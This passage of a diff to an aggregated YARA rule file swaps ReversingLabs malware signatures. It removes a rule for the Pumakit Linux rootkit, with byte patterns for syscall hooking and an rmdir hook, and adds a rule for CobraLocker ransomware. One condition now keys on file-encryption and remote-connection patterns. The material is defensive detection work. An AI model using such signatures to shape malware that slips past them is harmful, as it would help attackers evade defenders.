-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 72 ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 EB ?? 8B 8D ?? ?? ??
-            ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ??
-            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3
+		$find_files_and_encrypt = {
+            E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8
+            ?? ?? ?? ?? 46 4B 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 57
+            A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74
+            ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 80 C2 ?? E8
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 8B 00 FF
+            D0 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ??
+            ?? ?? ?? 8B D3 80 C2 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ??
+            ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 4B 80 FB ?? 0F 85 ?? ?? ?? ?? 57 A1 ?? ?? ??
+            ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1
+            ?? ?? ?? ?? 8B 00 FF D0 EB ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 46 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? ?? ?? ?? 57 A1 ??
+            ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
+            ?? ?? ?? 8B 00 FF D0 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ??
+            ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? A1 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            52 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 50 B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 59 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? C6 45 ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 8B
+            5D ?? 4B 85 DB 7C ?? 43 33 F6 80 7D ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
+            8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D
+            ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B
+            14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 46 4B 75 ?? BA ?? ??
+            ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B C8 B8 ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 B8 ?? ?? ??
+            ?? 5A E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? FF 35 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ??
+            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $ping_apnic and $download_bin_1 and $download_bin_2
+		uint16( 0 ) == 0x5A4D and $find_files_and_encrypt and $remote_connection_1 and $remote_connection_2
 }
-rule REVERSINGLABS_Linux_Rootkit_Pumakit : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cobralocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Pumakit rootkit."
+		description = "Yara rule that detects CobraLocker ransomware."
 		author = "ReversingLabs"
-		id = "c5c41245-6252-569a-992f-e27a5a3b67f0"
-		date = "2025-08-26"
-		modified = "2025-08-26"
+		id = "dada6370-3ae3-5931-ba9f-da56ebbcd8c8"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/rootkit/Linux.Rootkit.Pumakit.yara#L1-L161"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara#L1-L59"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "437ed7db3f71106b3e30f11ccbd43e66b7b79fc92dc5372d9497a4d2c328b55c"
+		logic_hash = "95f4c645c7c237d23b5028f824f78a5f9f8f0a4737b391d877582afe08264d7e"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Rootkit"
-		tc_detection_name = "Pumakit"
-		tc_detection_factor = 4
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CobraLocker"
+		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$hooking_syscalls_mechanism_p1 = {
-            E8 ?? ?? ?? ?? 55 48 C7 C7 ?? ?? ?? ?? 48 89 E5 41 57 41 56 41 55 41 54 53 51 E8 ??
-            ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 31 D2 48 89 05 ?? ?? ?? ?? 48 8B BA ?? ?? ?? ?? 48 85 FF 75 ?? 48
-            8B 8A ?? ?? ?? ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 80 7C 01 ?? ?? 75 ?? 48 63 74 01 ??
-            48 01 C6 48 01 CE 48 81 FE ?? ?? ?? ?? 75 ?? 48 8D 3C 01 EB ?? 48 FF C0 48 83 F8 ??
-            75 ?? 48 89 BA ?? ?? ?? ?? 48 81 C2 ?? ?? ?? ?? 48 81 FA ?? ?? ?? ?? 75 ?? 48 C7 C3
-            ?? ?? ?? ?? 49 C7 C5 ?? ?? ?? ?? 48 83 7B ?? ?? 0F 85 ?? ?? ?? ?? 48 C7 C7 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 4C 8B 25 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3B
-            2E E8 ?? ?? ?? ?? 49 89 C4 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 43 ?? 48 8B 05 ?? ?? ??
-            ?? 4D 8D 74 24 ?? 4D 89 E7 48 8B 40 ?? 48 89 45 ?? 48 8B 75 ?? BA ?? ?? ?? ?? 4C 89
-            FF E8 ?? ?? ?? ?? 85 C0 74 ?? 49 FF C7 4D 39 FE 75 ?? EB ?? 4D 85 FF 74 ?? 31 C0 4D
-            39 FC 0F 94 C0 89 43 ?? 74 ?? 31 C0 41 81 3C 24 ?? ?? ?? ?? 0F 94 C0 89 43 ?? 4C 89
-            7B ?? 83 7B ?? ?? 74 ?? 48 8B 43 ?? 4C 89 20 83 7B ?? ?? 74 ?? 48 8B 43 ?? 48 8B 53
-            ?? 48 83 C0 ?? 48 89 02 83 7B ?? ?? 75 ?? 48 8B 73 ?? 48 85 F6 74 ?? 48 C7 43 ?? ??
-            ?? ?? ?? 4C 8D 63 ?? 31 C9 31 D2 48 C7 43 ?? ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 85
-            C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 43 ?? ?? ?? ?? ?? 48 81 C3 ?? ?? ??
-            ?? 49 39 DD 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ??
-            ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ??
-            ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80
-        }
-		$hooking_syscalls_mechanism_p2 = {
-            48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15
-            ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ??
-            ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48
-            C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89
-            15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ??
-            ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ??
-            48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ??
-            ?? 48 8B 90 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ??
-            ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 80 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 10 48 C7 40 ?? ?? ?? ?? ?? 48 89 15
-            ?? ?? ?? ?? 48 8B 50 ?? 48 C7 00 ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ??
-            ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 80
-        }
-		$hook_rmdir_1 = {
-            E8 ?? ?? ?? ?? 55 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 E5 41 57 41 56 41 55 41 54 53
-            48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8B 67 ?? 48 8D BD ?? ?? ?? ?? 65 48 8B 04 25 ?? ??
-            ?? ?? 48 89 45 ?? 31 C0 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 4C
-            89 E6 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 48 AB 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 85 C0 7F ?? 48 8B 05 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 55 ?? 65 48 2B 14
-            25 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 41 5C 41 5D 41 5E 41 5F 5D
-            E9 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 3D ?? ?? ?? ??
-            0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 83 F8 ?? 76 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 31 C0 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 B4 05
-            ?? ?? ?? ?? 40 38 B0 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C0 ?? 48 83 F8 ?? 75 ?? BE
-            ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 8D 50 ?? 83 FA ?? 0F 8E ?? ?? ?? ?? 0F B6 B5 ?? ?? ?? ?? 83 FA ??
-            7E ?? 40 80 FE ?? 7E ?? 83 E8 ?? BA ?? ?? ?? ?? 85 C0 7F ?? EB ?? 39 C8 7E ?? 0F B6
-            8C 15 ?? ?? ?? ?? 88 8C 15 ?? ?? ?? ?? 89 D1 48 83 C2 ?? 83 F9 ?? 75 ?? 40 80 FE ??
-            0F 84 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 80 FE ?? 0F 84 ?? ?? ?? ?? 0F 8E ?? ?? ?? ??
-            40 80 FE ?? 0F 85 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 63 90 ?? ?? ?? ?? 48 85
-            D2 0F 8E ?? ?? ?? ?? 48 C7 C0 ?? ?? ?? ?? 49 C7 C5 ?? ?? ?? ?? EB ?? 48 83 C0 ?? 48
-            3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 3B 10 75 ?? 48 8B 3D ?? ?? ?? ?? BA
-        }
-		$hook_rmdir_2 = {
-            BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 8B
-            05 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? BE ??
-            ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 41 80 7D ?? ?? 4C 89 E9 75 ??
-            41 8B 06 85 C0 74 ?? 48 C7 C1 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 49 63
-            FF 4D 89 F0 44 29 FE 48 C7 C2 ?? ?? ?? ?? 48 63 F6 48 01 C7 E8 ?? ?? ?? ?? 41 01 C7
-            49 83 C5 ?? 49 83 C6 ?? 49 81 FD ?? ?? ?? ?? 75 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ??
-            ?? 49 63 FF 48 C7 C2 ?? ?? ?? ?? 44 29 FE 48 63 F6 48 01 C7 E8 ?? ?? ?? ?? 46 8D 2C
-            38 4D 63 ED 49 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? BA ?? ?? ??
-            ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 4C 89 EA 4C 89 FE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B
-            BD
-        }
-		$hook_rmdir_3 = {
-            49 83 C5 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 41 80 7D ?? ?? 75 ?? 48 98 48 8D B5 ??
-            ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 04 40 48 C1 E0 ?? C6 80 ?? ?? ?? ?? ?? 48 8B 95
-            ?? ?? ?? ?? 4C 8D A0 ?? ?? ?? ?? 48 89 90 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 49 89 44 24 ?? E8 ?? ?? ?? ?? 49 89 44 24 ?? E9 ?? ?? ?? ?? 40 80 FE ?? 0F 84
-            ?? ?? ?? ?? 40 80 FE ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 0F
-            8F ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 63 B8 ?? ?? ?? ?? 48 89 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 48 85 C0 0F 84 ?? ?? ??
-            ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? BE ?? ?? ?? ?? 31 D2 EB ?? 8D 14 92 8D 54 50 ?? 0F BE 41 ?? 48 83 C1 ?? 84
-            C0 0F 84 ?? ?? ?? ?? 8D 78 ?? 40 80 FF ?? 76 ?? 3C ?? 0F 85 ?? ?? ?? ?? 81 FA ?? ??
-            ?? ?? 0F 8F ?? ?? ?? ?? 83 FE ?? 0F 8F ?? ?? ?? ?? 48 63 C6 83 EE ?? 89 94 85 ?? ??
-            ?? ?? 31 D2 EB ?? 49 C7 C5 ?? ?? ?? ?? 49 8B 45 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 49 83
-            7D ?? ?? 0F 89 ?? ?? ?? ?? 4D 85 ED 0F 84 ?? ?? ?? ?? 41 8B 45 ?? BA ?? ?? ?? ?? 4C
-            89 E7 48 8D B5 ?? ?? ?? ?? 4D 8D B5 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 49
-        }
-		$hook_rmdir_4 = {
-            8D 75 ?? 49 8D 7C 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 F7 E8 ??
-            ?? ?? ?? 49 89 C7 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 89 C6 BA
-            ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 49 8D 7C 24 ?? 4C 89 F6 4C 89 FA E8 ?? ?? ?? ??
-            BE ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 49 63 8D ?? ?? ?? ?? 83 C0 ?? 4D 8D 7D ?? 49 01 C4 48 81 F9 ?? ?? ?? ?? 0F
-            87 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 4C 89 FF 48 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 95 ?? ?? ?? ?? 4C 89 FE 4C 89 E7 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 F7
-            BA ?? ?? ?? ?? F3 48 AB 31 F6 4C 89 FF E8 ?? ?? ?? ?? 41 C7 45 ?? ?? ?? ?? ?? 49 C7
-            45 ?? ?? ?? ?? ?? 41 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 49 C7 45 ?? ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 49 8D 95 ?? ?? ?? ?? 49 81 FD ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89 D5 E9 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 89 C7 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48
-            C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
